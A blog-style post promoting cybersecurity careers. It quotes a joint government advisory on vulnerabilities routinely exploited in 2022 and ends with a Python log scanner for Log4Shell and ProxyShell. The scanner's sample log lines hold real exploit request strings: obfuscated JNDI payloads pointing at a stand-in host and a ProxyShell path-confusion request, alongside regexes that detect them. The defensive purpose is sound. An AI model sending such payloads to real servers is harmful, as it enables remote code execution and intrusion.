Old software continues to be a problem. You’ve probably heard that keeping your software up to date (software hygiene) is a core software security practice.
The cybersecurity market needs you. If you are looking at a career change or have just left the military, it needs you!
When I call someone a cyber security practitioner, I mean it. You never arrive in the cyber security world: you may be ahead for a minute, but the bad guys are working to leap ahead, and they do, all the time.
If you like being in the fight (yes, it’s predominantly digital, and I mean all the time), it’s a great career with many options for new entrants to the workforce and older ones alike.
There are many options: paid training, government-assisted training, and of course classes at your local community colleges and universities.
Massive Talent Shortage
3.4 million worldwide
750,000 in the US
A 35% increase over last year
These figures are from a SANS blog by Lance Spitzner.
Many people think cybersecurity is all about hacking into or breaking things, but cybersecurity is really learning about and helping protect how both technology and people work. The key to your success is not a technical background, but your willingness and desire to learn how technology works and to never stop playing. In addition, there are a growing number of fields in cybersecurity that do not focus on solving technical problems, but instead on human problems. These require softer skills, such as policy development, security awareness and training, governance, security communications, privacy or cyber law, and ethics.
See the following for what keeps people in the cyber security space busy. I’ve shortened the list considerably; this is just some of what cyber security practitioners deal with.
The following cybersecurity agencies coauthored this joint Cybersecurity Advisory (CSA): United States: The Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), and Federal Bureau of Investigation (FBI)
Australia: Australian Signals Directorate’s Australian Cyber Security Centre (ACSC)
Canada: Canadian Centre for Cyber Security (CCCS)
New Zealand: New Zealand National Cyber Security Centre (NCSC-NZ) and Computer Emergency Response Team New Zealand (CERT NZ)
United Kingdom: National Cyber Security Centre (NCSC-UK)
This advisory provides details on the Common Vulnerabilities and Exposures (CVEs) routinely and frequently exploited by malicious cyber actors in 2022 and the associated Common Weakness Enumeration(s) (CWE). In 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems.
CVE-2018-13379. This vulnerability, affecting Fortinet SSL VPNs, was also routinely exploited in 2020 and 2021. The continued exploitation indicates that many organizations failed to patch software in a timely manner and remain vulnerable to malicious cyber actors.
CVE-2021-34473, CVE-2021-31207, CVE-2021-34523. These vulnerabilities, known as ProxyShell, affect Microsoft Exchange email servers. In combination, successful exploitation enables a remote actor to execute arbitrary code. These vulnerabilities reside within the Microsoft Client Access Service (CAS), which typically runs on port 443 in Microsoft Internet Information Services (IIS) (e.g., Microsoft’s web server). CAS is commonly exposed to the internet to enable users to access their email via mobile devices and web browsers.
CVE-2021-40539. This vulnerability enables unauthenticated remote code execution (RCE) in Zoho ManageEngine ADSelfService Plus and was linked to the usage of an outdated third-party dependency. Initial exploitation of this vulnerability began in late 2021 and continued throughout 2022.
CVE-2021-26084. This vulnerability, affecting Atlassian Confluence Server and Data Center (a web-based collaboration tool used by governments and private companies) could enable an unauthenticated cyber actor to execute arbitrary code on vulnerable systems. This vulnerability quickly became one of the most routinely exploited vulnerabilities after a PoC was released within a week of its disclosure. Attempted mass exploitation of this vulnerability was observed in September 2021.
CVE-2021-44228. This vulnerability, known as Log4Shell, affects Apache’s Log4j library, an open-source logging framework incorporated into thousands of products worldwide. An actor can exploit this vulnerability by submitting a specially crafted request to a vulnerable system, causing the execution of arbitrary code. The request allows a cyber actor to take full control of a system. The actor can then steal information, launch ransomware, or conduct other malicious activity.[1] Malicious cyber actors began exploiting the vulnerability after it was publicly disclosed in December 2021, and continued to show high interest in CVE-2021-44228 through the first half of 2022.
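As an added worked example (this is not code from the advisory or from this post), the following Python script shows what "routinely exploited" looks like in a web server's access log for two of the entries above: the "specially crafted request" that triggers Log4Shell, and the `autodiscover.json?@` path-confusion request that characterised ProxyShell exploitation against an internet-exposed Exchange CAS. The Log4Shell detector normalises the request first, because attackers URL-encode the payload and hide the `jndi` keyword behind Log4j lookups such as `${lower:j}` or `${::-j}`, so a naive search for the literal string `${jndi:` misses most real traffic. The log lines, IP addresses and hostnames are constructed for this illustration.

```python
import re
import urllib.parse

# Constructed sample access-log lines (combined log format). Made up for this
# example; not captures from any real incident.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:03:14:07 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:03:15:22 +0000] "GET /login HTTP/1.1" 200 88 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:03:16:01 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://198.51.100.7/b} HTTP/1.1" 200 88 "-" "curl/7.68.0"',
    '10.0.0.9 - - [10/Dec/2021:03:16:40 +0000] "GET /?q=%24%7Bjndi%3Armi%3A%2F%2F198.51.100.7%2Fc%7D HTTP/1.1" 200 88 "-" "curl/7.68.0"',
    '10.0.0.9 - - [10/Dec/2021:03:17:05 +0000] "GET /?x=${${::-j}${::-n}${::-d}${::-i}:dns://198.51.100.7/d} HTTP/1.1" 200 88 "-" "curl/7.68.0"',
    '198.51.100.7 - - [13/Aug/2021:11:02:09 +0000] "GET /autodiscover/autodiscover.json?@evil.example/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@evil.example HTTP/1.1" 200 0 "-" "python-requests/2.26.0"',
]

# Log4j lookup forms commonly used to obfuscate the "jndi" keyword.
LOOKUP_LOWER = re.compile(r"\$\{lower:([^{}]*)\}", re.I)
LOOKUP_UPPER = re.compile(r"\$\{upper:([^{}]*)\}", re.I)
# ${key:-default} resolves to "default" when key is unset; ${::-j} is the classic form.
LOOKUP_DEFAULT = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
# After normalisation the payload reads ${jndi:<scheme>://<host>...}
JNDI = re.compile(r"\$\{jndi:([a-z]+):(?://)?([^/:}\s]+)", re.I)
# ProxyShell path confusion: an "@" inside the autodiscover.json query.
PROXYSHELL = re.compile(r"autodiscover\.json\?@", re.I)


def url_decode_fully(s, max_rounds=3):
    """Undo URL encoding repeatedly, since payloads are often double-encoded."""
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def collapse_lookups(s, max_rounds=10):
    """Resolve innermost lower/upper/default lookups until nothing changes."""
    for _ in range(max_rounds):
        new = LOOKUP_LOWER.sub(lambda m: m.group(1).lower(), s)
        new = LOOKUP_UPPER.sub(lambda m: m.group(1).upper(), new)
        new = LOOKUP_DEFAULT.sub(lambda m: m.group(1), new)
        if new == s:
            break
        s = new
    return s


def normalize(line):
    return collapse_lookups(url_decode_fully(line))


def scan_line(index, line):
    """Return a hit dict for a suspicious log line, or None."""
    norm = normalize(line)
    m = JNDI.search(norm)
    if m:
        return {"line": index, "cve": "CVE-2021-44228",
                "scheme": m.group(1).lower(), "host": m.group(2)}
    if PROXYSHELL.search(norm):
        return {"line": index, "cve": "ProxyShell", "scheme": None, "host": None}
    return None


def scan_logs(lines):
    hits = []
    for i, line in enumerate(lines):
        hit = scan_line(i, line)
        if hit:
            hits.append(hit)
    return hits


if __name__ == "__main__":
    for hit in scan_logs(SAMPLE_LOGS):
        print(hit)
```

A `dns://` scheme usually means the attacker is only probing for a callback, while `ldap://` or `rmi://` means the request is trying to make the server load attacker-hosted code; both deserve a ticket, but the latter is the one to treat as an active exploitation attempt. Run the script against real logs by replacing `SAMPLE_LOGS` with lines read from your access log.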